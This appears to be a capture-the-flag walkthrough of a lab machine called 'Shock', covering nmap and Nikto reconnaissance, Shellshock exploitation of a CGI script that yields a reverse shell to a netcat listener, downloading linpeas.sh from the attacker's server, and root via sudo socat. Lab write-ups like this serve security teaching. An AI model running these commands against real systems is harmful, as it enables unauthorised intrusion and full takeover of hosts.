# Shock ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-097d749cebd72974f19b283e9a48b1b38c804e8a%2Fimage.png?alt=media) ## Nmap ``` nmap 172.31.1.3 -p- -A 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 12:ee:09:94:d5:4b:4a:d9:3b:95:3a:d6:63:e7:98:6f (RSA) | 256 b9:f8:52:aa:62:02:af:6c:09:ca:dc:3e:7b:b3:94:b7 (ECDSA) |_ 256 53:5d:98:f7:61:e0:57:df:38:96:f9:be:59:77:6c:f4 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Steak House Shock Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel ``` ## FTP Looking at our Nmap results we can start with a check on anonymous login check with FTP. ``` nmap 172.31.1.3 --script=ftp-anon.nse -p 21 PORT STATE SERVICE 21/tcp open ftp ``` We get no feedback regarding anonymous login and will require a manual check. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1b2b6a45817b274501bd18dc7dd16b5841ed2320%2Fimage.png?alt=media) As anonymous login for this server is not allowed we can check for exploits on vsFTPd 3.0.3 using searchsploit. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9441af4d7b303588b44ae2e3d37262df952312a4%2Fimage.png?alt=media) I also Google searched and found no current exploits for vsFTPd 3.0.3. We can next take a look at HTTP on port 80 since this is our next best logical attack vector. ## HTTP ![http://172.31.1.3/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-733fd159ac7aff30506096af0304f63ca7c036b1%2Fimage.png?alt=media) I have also started a scan with Nikto on this webpage. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8626b75aa3943fbeb4a6ed9d95f4878bffaa32b4%2Fimage.png?alt=media) ## Exploitation Nikto reports a possible exploit on /cgi-bin/test.cgi to the Shellshock exploit. A brief overview of what is is taken from [www.netsparker.com](https://www.netsparker.com/blog/web-security/cve-2014-6271-shellshock-bash-vulnerability-scan/) ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c16992d1a0734c5871c71e97c0dd5a897256bff2%2Fimage.png?alt=media) ### PoC Searching for HTTP Shellshock PoC's brings us to the following by zalalov on Github. {% embed url="" %} Download the python script and then set up as per the README: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-7eaf214c62b89dee478dbcdf36875b8a79965d67%2Fimage.png?alt=media) Start a netcat listener on the attacking machine. ``` nc -lvp 4444 ``` Then call the Python script with the correct arguments for our machine. ``` python2 shellshock.py 172.31.1.3 /cgi-bin/test.cgi /4444 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a3730cc0a2a26a25c9f26ed3cb9445efa65375b2%2Fimage.png?alt=media) After a short amount of time we should get a shell back on our listener. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-337bad1b7eaadbc0379c7152fd6d2670195abcac%2Fimage.png?alt=media) From here we can perform an upgrade on the shell we currently have. ``` /usr/bin/script -qc /bin/bash /dev/null ``` ## Privilege Escalation Next I uploaded linpeas.sh in the attempt to look for any easy privilege escalation vectors. I started a Python SimpleHTTPServer on my attacking machine pointing at my Linux enumeration scripts. ``` Python2 -m SimpleHTTPServer 80 ``` I then performed `wget` on the target file. ``` wget http://:/ ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-50433a48551871d77a2b8f0a051be4f4004b2416%2Fimage.png?alt=media) Once completed I executed linpeas.sh and waited for it to complete. Once complete we see we have access to socat using sudo. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-11a9becf57de4fbbe7d1324097dd4b75a10a3f25%2Fimage.png?alt=media) Looking at socat on [GTFObins](https://gtfobins.github.io/gtfobins/socat/) we see we can call bash with root permissions. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-97c4f609b0a40a817e8d6a280940c2411357eea7%2Fimage.png?alt=media) ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9b0862607b99ad32246888166426073bf8660f24%2Fimage.png?alt=media) We are now root on the target machine.